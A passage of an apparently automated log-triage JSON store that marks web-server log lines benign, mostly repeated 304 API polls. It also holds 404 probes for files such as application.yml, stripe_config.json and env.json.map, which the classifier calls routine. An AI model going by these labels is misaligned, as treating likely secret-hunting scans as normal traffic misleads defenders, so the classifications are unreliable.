"1f2c129069100b59ade3a24b349562702e760f4b631274bc18de62b5457d6d90", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint with a normal 304 response and typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.431 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:57.681847884Z" }, "1fd74166e72dde8507007d684d5df296f6168e14dfdeee6c9e92f4f411c7b58c": { "type": "hash", "value": "1fd74166e72dde8507007d684d5df296f6168e14dfdeee6c9e92f4f411c7b58c", "source": "auto", "reason": "HTTP GET to an application log endpoint returning 304 (not modified) with a routine latency value; appears like normal polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.938 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:00.926017779Z" }, "203a2ea5af88402f6f67feed45829387d4f56a32374344dd094803fdef126c0a": { "type": "hash", "value": "203a2ea5af88402f6f67feed45829387d4f56a32374344dd094803fdef126c0a", "source": "auto", "reason": "Looks like a normal authenticated API GET request returning HTTP 304 with a reasonable latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.782 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:42.901894649Z" }, "209fae6b959d212cfee36b39ce8bf12fbb4ac4481dd254d1f2df3b09f1f6b8d3": { "type": "hash", "value": "209fae6b959d212cfee36b39ce8bf12fbb4ac4481dd254d1f2df3b09f1f6b8d3", "source": "auto", "reason": "This is a routine HTTP GET request to an application logs endpoint with a 304 (not modified) status and a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.619 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:44.022829549Z" }, "20ee360baf6004b702ab55383c112f447731d7cc03aecd8c1322e7077147201f": { "type": "hash", "value": "20ee360baf6004b702ab55383c112f447731d7cc03aecd8c1322e7077147201f", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a duration; appears normal operational access.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.643 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:21.872536877Z" }, "214289efea701271f9f50e32ce7d227786f690b6581dcde545e607996eb7dcb7": { "type": "hash", "value": "214289efea701271f9f50e32ce7d227786f690b6581dcde545e607996eb7dcb7", "source": "auto", "reason": "Normal HTTP 404 on a debug log path; no indication of attack behavior.", "original_line": "\u001b[0mGET /debug.log \u001b[33m404\u001b[\u003cDUR\u003e 0.676 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:35:25.066300721Z" }, "2186add7ab27da3ae715cefa1dd0969d7b53e983d33bd96849f37c214bf630ba": { "type": "hash", "value": "2186add7ab27da3ae715cefa1dd0969d7b53e983d33bd96849f37c214bf630ba", "source": "auto", "reason": "HTTP GET request to an app logs endpoint returned 304 (not modified) with a typical latency; appears to be normal application access within a container.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.429 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:00.767366191Z" }, "21ac71850c8c64f0494e3fbb3f5a12f4b0470fc42e3f68b54afbfd9d768d2641": { "type": "hash", "value": "21ac71850c8c64f0494e3fbb3f5a12f4b0470fc42e3f68b54afbfd9d768d2641", "source": "auto", "reason": "Looks like a routine HTTP GET request from an application API returning 304 (Not Modified) with a response time; no exploit indicators present.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 39.760 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:03.837207731Z" }, "21b2141ad2c31d00d6530e993f5a7eba734b5124d1df9199bdd4ea7ed3bb2425": { "type": "hash", "value": "21b2141ad2c31d00d6530e993f5a7eba734b5124d1df9199bdd4ea7ed3bb2425", "source": "auto", "reason": "Routine HTTP GET request to an application API returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.104 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:09.813606098Z" }, "22313e326b441498d1a4ce2b338b49b3f8f1fa602d98d998b2443d16c53db80e": { "type": "hash", "value": "22313e326b441498d1a4ce2b338b49b3f8f1fa602d98d998b2443d16c53db80e", "source": "auto", "reason": "Appears to be a routine HTTP GET request from the service, returning status code 304 (not modified) with a typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.795 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:48.761690153Z" }, "223487ceee3e99263cc22adbaa5a033e745363fd0ad72ceefef549456c0b5d51": { "type": "hash", "value": "223487ceee3e99263cc22adbaa5a033e745363fd0ad72ceefef549456c0b5d51", "source": "auto", "reason": "Looks like a routine HTTP GET request from the application/API returning 304 (Not Modified) with a low response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 2.142 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:33:24.764663045Z" }, "22d09a65dc07d6ab3a55e496a22dae31758b5ee6be165dabe50b035d2c683f46": { "type": "hash", "value": "22d09a65dc07d6ab3a55e496a22dae31758b5ee6be165dabe50b035d2c683f46", "source": "auto", "reason": "Looks like a normal HTTP GET request that returned 304 (not modified) with a small latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api \u001b[36m304\u001b[\u003cDUR\u003e 3.401 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:24.64371442Z" }, "2310928c6c67755e5a2c9e376acdaea9287cb09c59ab05184b68fa143cae6082": { "type": "hash", "value": "2310928c6c67755e5a2c9e376acdaea9287cb09c59ab05184b68fa143cae6082", "source": "auto", "reason": "Appears to be a normal HTTP GET to an application logs endpoint returning 304 (not modified); duration is present and status is not an error.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.502 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:48.644560058Z" }, "2362fbeec1aa3989b5c397d6abfcdc7da69d53df52b4d056620cba6c61ea9aee": { "type": "hash", "value": "2362fbeec1aa3989b5c397d6abfcdc7da69d53df52b4d056620cba6c61ea9aee", "source": "auto", "reason": "Routine HTTP GET request to an API endpoint with a 304 response and normal latency; appears to be application/API access traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.108 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:16.027646313Z" }, "244c3107dab4c4268df9f5622f6732b8b29e27afdf6db2954ebb43e16d79f78e": { "type": "hash", "value": "244c3107dab4c4268df9f5622f6732b8b29e27afdf6db2954ebb43e16d79f78e", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with a normal latency; appears like standard API polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.397 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:42.976947349Z" }, "24eb2a7d4b6c146fddba6c35a0ce2a2e39fc0df5dfc4f7fb802ac8a57f79b479": { "type": "hash", "value": "24eb2a7d4b6c146fddba6c35a0ce2a2e39fc0df5dfc4f7fb802ac8a57f79b479", "source": "auto", "reason": "Routine HTTP GET request to an internal API endpoint with a 304 status and a latency value; no signs of injection or exploitation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 50.521 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:03.766716906Z" }, "25600d67458ffd96cbdfea917d50aef6482f4e29a830e13fcc0b075facb6c80e": { "type": "hash", "value": "25600d67458ffd96cbdfea917d50aef6482f4e29a830e13fcc0b075facb6c80e", "source": "auto", "reason": "Looks like a routine HTTP GET to an application logs endpoint returning 304 (not modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.157 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:45.877349601Z" }, "26b2ceb099d82ba9f6c5301daa9ac057a754e75f9810c4f5d88ffa7c30eb835d": { "type": "hash", "value": "26b2ceb099d82ba9f6c5301daa9ac057a754e75f9810c4f5d88ffa7c30eb835d", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (Not Modified) with normal latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.100 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:12.747853492Z" }, "2726699b0eddb4ea6b91e1c5024cc8871b7dae5d87425702b4982ebe0fbdf61c": { "type": "hash", "value": "2726699b0eddb4ea6b91e1c5024cc8871b7dae5d87425702b4982ebe0fbdf61c", "source": "auto", "reason": "Normal static asset request returning 200 OK with a reasonable duration and size.", "original_line": "\u001b[0mGET /icon-512x512.png \u001b[32m200\u001b[\u003cDUR\u003e 1.831 ms - \u003cNUM\u003e\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T10:32:58.029432779Z" }, "276761271b0e56e1070a8f020cface2ad447f221183d515b13a430249e5aa148": { "type": "hash", "value": "276761271b0e56e1070a8f020cface2ad447f221183d515b13a430249e5aa148", "source": "auto", "reason": "Standard HTTP GET request for a static resource returning 404. Routine client behavior; no anomalies detected.", "original_line": "\u001b[0mGET /env.json.map \u001b[33m404\u001b[\u003cDUR\u003e 0.893 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:44.120980639Z" }, "293f1efeeac89c9fc4ce9dbb6e26f03100d7ee68e6e2465831d559979717abce": { "type": "hash", "value": "293f1efeeac89c9fc4ce9dbb6e26f03100d7ee68e6e2465831d559979717abce", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning HTTP 304 with a short latency; appears like normal cache revalidation.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.467 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:09.750726755Z" }, "2975f8c4cbb2869c9afbd56afdc60bf26f6721720e531a58ffb19dfe100661c7": { "type": "hash", "value": "2975f8c4cbb2869c9afbd56afdc60bf26f6721720e531a58ffb19dfe100661c7", "source": "auto", "reason": "Looks like a normal HTTP GET request with a 304 status and routine latency metric from a dockerized app.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 18.947 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:18.867900172Z" }, "29772d8c8e21ac5cfca0ecfb87cc2e5b61653dab29a34ed3bbb2ed9d9904ee62": { "type": "hash", "value": "29772d8c8e21ac5cfca0ecfb87cc2e5b61653dab29a34ed3bbb2ed9d9904ee62", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint returning HTTP 304 (not modified); appears operational rather than an attack.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.811 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:48.701869948Z" }, "29c1c3f6c81646db9ef530728936d422935f0dd739e93fbafac506aa47495477": { "type": "hash", "value": "29c1c3f6c81646db9ef530728936d422935f0dd739e93fbafac506aa47495477", "source": "auto", "reason": "Normal HTTP 404 response for a request to a non-existent file in a web server; common during scans or misconfigurations, but not inherently malicious.", "original_line": "\u001b[0mGET /application.yml \u001b[33m404\u001b[\u003cDUR\u003e 0.857 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:33:00.153578135Z" }, "29d7fbb220606dedeb0859e550c30bae7dd59e32abf27d715ef321b68855c6ca": { "type": "hash", "value": "29d7fbb220606dedeb0859e550c30bae7dd59e32abf27d715ef321b68855c6ca", "source": "auto", "reason": "Regular HTTP request to /billing resulting in 404 with a small response and normal duration; not indicative of attack or misbehavior.", "original_line": "\u001b[0mGET /billing \u001b[33m404\u001b[\u003cDUR\u003e 9.741 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:21:36.599246881Z" }, "2ac75cd18e1b4c3c3721f949b89f78910c83980163e54b9adda11b003cb21fe3": { "type": "hash", "value": "2ac75cd18e1b4c3c3721f949b89f78910c83980163e54b9adda11b003cb21fe3", "source": "auto", "reason": "Looks like a routine HTTP GET request to an API endpoint returning 304 (not modified) with a typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.371 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:21.838876627Z" }, "2b2b87ec21184bb0c079f14b8f92ed6721cc759564fc20c01439d3a72bbd6678": { "type": "hash", "value": "2b2b87ec21184bb0c079f14b8f92ed6721cc759564fc20c01439d3a72bbd6678", "source": "auto", "reason": "GET request for a configuration file that returned 404 is a common, non-malicious client request; not indicative of attack", "original_line": "\u001b[0mGET /stripe_config.json \u001b[33m404\u001b[\u003cDUR\u003e 1.177 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:29:05.395271126Z" }, "2baa4512c30b2cda77405bfdc4dbfdac405b5b537695e30f76f5c2d3cb1f22b7": { "type": "hash", "value": "2baa4512c30b2cda77405bfdc4dbfdac405b5b537695e30f76f5c2d3cb1f22b7", "source": "auto", "reason": "Looks like a routine HTTP GET to a user logs endpoint with a 304 response (not modified), suggesting normal polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.990 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:41:57.588233446Z" }, "2c54efa08c9c11ad79347ca25e87597358b8736e7b54d616d4a71dedc3489417": { "type": "hash", "value": "2c54efa08c9c11ad79347ca25e87597358b8736e7b54d616d4a71dedc3489417", "source": "auto", "reason": "Routine HTTP GET request to an application API endpoint returning status 304 (not modified).", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.552 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:18.753046506Z" }, "2c6e1be67a3621bf09015c35341660f5f3af0a537c3aead1aa3a47322eda074e": { "type": "hash", "value": "2c6e1be67a3621bf09015c35341660f5f3af0a537c3aead1aa3a47322eda074e", "source": "auto", "reason": "Regular HTTP GET to an API endpoint returning 304 (not modified) with a normal response time; appears routine polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.774 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:00.926890235Z" }, "2c72d6374f0a3a05eb2fa645fa2cebf591d26acc114907db92b14c94528f98d7": { "type": "hash", "value": "2c72d6374f0a3a05eb2fa645fa2cebf591d26acc114907db92b14c94528f98d7", "source": "auto", "reason": "Docker service logs show a normal HTTP GET for an application logs endpoint with a 304 status (not modified) and typical latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.092 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:38:25.969002351Z" }, "2cc8623e65788635f28023f5b7421ca8283e329cc5077f71d95c22d1e62c805c": { "type": "hash", "value": "2cc8623e65788635f28023f5b7421ca8283e329cc5077f71d95c22d1e62c805c", "source": "auto", "reason": "Standard health/static asset fetch (robots.txt) returning HTTP 200; normal web server activity.", "original_line": "\u001b[0mGET /robots.txt \u001b[32m200\u001b[\u003cDUR\u003e 12.424 ms - 26\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T16:01:07.501146267Z" }, "2d694925bde5bac8285e13e26ec946405cb97b855bfe130ec31a9092b141bf41": { "type": "hash", "value": "2d694925bde5bac8285e13e26ec946405cb97b855bfe130ec31a9092b141bf41", "source": "auto", "reason": "Routine HTTP GET to an API endpoint returning 304 (not modified) with a short duration; typical application caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.126 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:26:30.809323449Z" }, "2dddfec38b43bceb30fa1dfb28a7a9f6e93a31f5819cbb9791b470f78399238c": { "type": "hash", "value": "2dddfec38b43bceb30fa1dfb28a7a9f6e93a31f5819cbb9791b470f78399238c", "source": "auto", "reason": "Looks like a normal HTTP GET to an application logs endpoint returning 304 (not modified), with routine latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 35.300 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:36:45.94060962Z" }, "2eab8fbbee694b1ac7564742b84e83c80af7c7645a4ca0510906e2c6f8925801": { "type": "hash", "value": "2eab8fbbee694b1ac7564742b84e83c80af7c7645a4ca0510906e2c6f8925801", "source": "auto", "reason": "HTTP GET request to an application logs endpoint returning 304 (not modified) with a response time; looks like normal read/check behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.813 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:28.033314838Z" }, "2eb44d453db04e235793e2ee94b87acdb9457b1cd70b73f4df465ba5f7dca58b": { "type": "hash", "value": "2eb44d453db04e235793e2ee94b87acdb9457b1cd70b73f4df465ba5f7dca58b", "source": "auto", "reason": "A normal HTTP GET request to /order resulting in 404 is a common, non-malicious operational log. Not indicative of an attack by itself.", "original_line": "\u001b[0mGET /order \u001b[33m404\u001b[\u003cDUR\u003e 0.915 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:18:19.359462441Z" }, "2f66ac06f948e2edfde3c74ad9b2646adfdbafd5ec6853ec09c4b5ca6e663d05": { "type": "hash", "value": "2f66ac06f948e2edfde3c74ad9b2646adfdbafd5ec6853ec09c4b5ca6e663d05", "source": "auto", "reason": "Appears to be a normal HTTP GET request to an application logs endpoint with a 304 response and a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 157.513 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:30:04.013756638Z" }, "312a5a01fa887998c97a311f9afe3f54ef45eff2d26fdd858160aeb8d4476ac1": { "type": "hash", "value": "312a5a01fa887998c97a311f9afe3f54ef45eff2d26fdd858160aeb8d4476ac1", "source": "auto", "reason": "HTTP GET request to an application logs endpoint with a 304 status; appears like routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.170 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:40:06.756985745Z" }, "322572f0b5f3a4db6dcd4e7a27a9e8c94c4d5a8a81e7386ef60ca5c4a0b8fc7b": { "type": "hash", "value": "322572f0b5f3a4db6dcd4e7a27a9e8c94c4d5a8a81e7386ef60ca5c4a0b8fc7b", "source": "auto", "reason": "Single normal 404 for a static file request with a small processing time; no anomalous behavior detected.", "original_line": "\u001b[0mGET /stripe.txt \u001b[33m404\u001b[\u003cDUR\u003e 0.622 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:01.817343331Z" }, "3234629dadf6dd19258fbcc42ee0869efb8e9fdffc0016c7cd3ca3dd41e68c70": { "type": "hash", "value": "3234629dadf6dd19258fbcc42ee0869efb8e9fdffc0016c7cd3ca3dd41e68c70", "source": "auto", "reason": "Regular HTTP 404 response for a request to /stripe.save; not inherently malicious, typical noise for web apps.", "original_line": "\u001b[0mGET /stripe.save \u001b[33m404\u001b[\u003cDUR\u003e 1.385 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:28:40.686319176Z" }, "33088be0f6402621419c11f0314640655cc5f7c14574592ba21a6161e332b4f6": { "type": "hash", "value": "33088be0f6402621419c11f0314640655cc5f7c14574592ba21a6161e332b4f6", "source": "auto", "reason": "Looks like a normal HTTP GET to an application logs endpoint returning 304 (not modified) with a typical latency and no error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 23.666 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:15.709959832Z" }, "336e4d4f8512db19db6946ece1d3feb3a4508160e97701b5aaf1d3ded34972e3": { "type": "hash", "value": "336e4d4f8512db19db6946ece1d3feb3a4508160e97701b5aaf1d3ded34972e3", "source": "auto", "reason": "HTTP GET to an application log endpoint with a 304 status and a normal response time; appears to be routine client polling/caching behavior.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.971 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:26.005201834Z" }, "33c648a9a81759386dea1b8f08d6f8b50db2cdd9d35b3056e9faff8cf49e614f": { "type": "hash", "value": "33c648a9a81759386dea1b8f08d6f8b50db2cdd9d35b3056e9faff8cf49e614f", "source": "auto", "reason": "Routine HTTP GET request to an application logs endpoint with a normal 304 response (not a failure) and a valid latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.899 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:00.957239974Z" }, "33e7f1aad7d44ba0001e497790e2d4cc6f21343fdee3b872343a0961398d5b67": { "type": "hash", "value": "33e7f1aad7d44ba0001e497790e2d4cc6f21343fdee3b872343a0961398d5b67", "source": "auto", "reason": "Standard 404 response for a missing map file; common in web server logs.", "original_line": "\u001b[0mGET /constants.js.map \u001b[33m404\u001b[\u003cDUR\u003e 3.881 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:25:21.489863233Z" }, "342908ba15abfbc434fc3fd5d054a6d5ed7f3f3495dcab96c029f2a6d6aaccfe": { "type": "hash", "value": "342908ba15abfbc434fc3fd5d054a6d5ed7f3f3495dcab96c029f2a6d6aaccfe", "source": "auto", "reason": "Appears to be a routine HTTP GET to an API endpoint returning 304 (not modified), with an associated response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 26.920 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:00.719713443Z" }, "34cc57c4b85fd7f5f3f11393491b35484313edacd9acc3dbb9c1bc11e33610e2": { "type": "hash", "value": "34cc57c4b85fd7f5f3f11393491b35484313edacd9acc3dbb9c1bc11e33610e2", "source": "auto", "reason": "Normal HTTP request for a static resource returning 404 is common and not indicative of attack.", "original_line": "\u001b[0mGET /main.js \u001b[33m404\u001b[\u003cDUR\u003e 0.921 ms - 9\u001b[\u003cDUR\u003e", "created_at": "2026-03-20T15:24:36.945793376Z" }, "34cd0a0a00e639f126582848608ef9ac3cf1a48dc294d1bc1b2464674330f670": { "type": "hash", "value": "34cd0a0a00e639f126582848608ef9ac3cf1a48dc294d1bc1b2464674330f670", "source": "auto", "reason": "Docker container log shows a standard HTTP GET to an API endpoint returning 304 (not modified) with a normal response time; no obvious attack indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.858 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:24:54.475083923Z" }, "35295a132fb85a5afeb36c973466820edaba2f723b7ab53a80f9893079ef9c1a": { "type": "hash", "value": "35295a132fb85a5afeb36c973466820edaba2f723b7ab53a80f9893079ef9c1a", "source": "auto", "reason": "Looks like a normal HTTP GET request to an application API endpoint with a 304 status and a recorded response time; no clear exploit or error indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.713 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:25:36.753332717Z" }, "353b64e2c68d3082ddb77fa50d962811eda7d898bcc924fecb0f3e369806969e": { "type": "hash", "value": "353b64e2c68d3082ddb77fa50d962811eda7d898bcc924fecb0f3e369806969e", "source": "auto", "reason": "Routine HTTP GET for application logs that returns 304 (not modified) with a low latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 22.129 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:37:30.731230291Z" }, "362ff64426c7f0671a0337c20175b60ddc97569d883c76c575d976cd4d87b6a3": { "type": "hash", "value": "362ff64426c7f0671a0337c20175b60ddc97569d883c76c575d976cd4d87b6a3", "source": "auto", "reason": "HTTP GET to a known API endpoint returning 304 (not modified) with normal response time; looks like routine application traffic.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 19.573 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:12.798621847Z" }, "363c63d9dd2b95a6418340bdb0899a986e10232af2c71c9577d4177702348c07": { "type": "hash", "value": "363c63d9dd2b95a6418340bdb0899a986e10232af2c71c9577d4177702348c07", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified) with normal timing.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.264 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:35:36.763267126Z" }, "371f098146a29707b4d76b5e2331552a746d7f292e1c133beedfa83902a3840d": { "type": "hash", "value": "371f098146a29707b4d76b5e2331552a746d7f292e1c133beedfa83902a3840d", "source": "auto", "reason": "Routine HTTP GET to an application API endpoint returning status 304 (not modified), with a normal low latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 24.104 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:31:26.164940218Z" }, "372f6b39a3270c6ca5da7e1446de90f9ec0b1fd6476214a7fbe9cf118f9b4c35": { "type": "hash", "value": "372f6b39a3270c6ca5da7e1446de90f9ec0b1fd6476214a7fbe9cf118f9b4c35", "source": "auto", "reason": "Looks like a routine HTTP GET to an application API endpoint returning 304 (Not Modified) with a short duration; no clear exploit indicators.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 20.107 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:29:48.687326429Z" }, "376d4a274b078b764867a6a2361257ca6636e87de02693b9da01f1ae29978e73": { "type": "hash", "value": "376d4a274b078b764867a6a2361257ca6636e87de02693b9da01f1ae29978e73", "source": "auto", "reason": "Looks like a routine HTTP GET request to an application logs endpoint returning 304 (not modified) with a normal response time.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.661 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:32:48.743186406Z" }, "3773f143e85aef963063b5b14e1a48deff78ef28da25ed9ff4e946af47335cd3": { "type": "hash", "value": "3773f143e85aef963063b5b14e1a48deff78ef28da25ed9ff4e946af47335cd3", "source": "auto", "reason": "Routine HTTP GET to an application logs endpoint returning 304 (not modified), with a normal latency value.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.040 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:42:54.742674381Z" }, "379f2d894d089df36223e203276a1531ea73d126c8b83265fe8ca10902b8265d": { "type": "hash", "value": "379f2d894d089df36223e203276a1531ea73d126c8b83265fe8ca10902b8265d", "source": "auto", "reason": "Looks like a routine HTTP GET request to the app logs endpoint returning 304 (not modified).", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 30.765 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:34:51.701141551Z" }, "38bfe57a0f8bd5cb2228b4ad5e7ab73e86eb078cc2bcdfc1b5462e16a96ec744": { "type": "hash", "value": "38bfe57a0f8bd5cb2228b4ad5e7ab73e86eb078cc2bcdfc1b5462e16a96ec744", "source": "auto", "reason": "Looks like a normal HTTP GET request to an API endpoint returning 304 (not modified) with a measured latency.", "original_line": "\u001b[0mGET /api/v2/user/apps/appData/api/logs?encoding=hex \u001b[36m304\u001b[\u003cDUR\u003e 21.943 ms - -\u001b[\u003cDUR\u003e", "created_at": "2026-03-19T22:28:33.728298474Z" }, 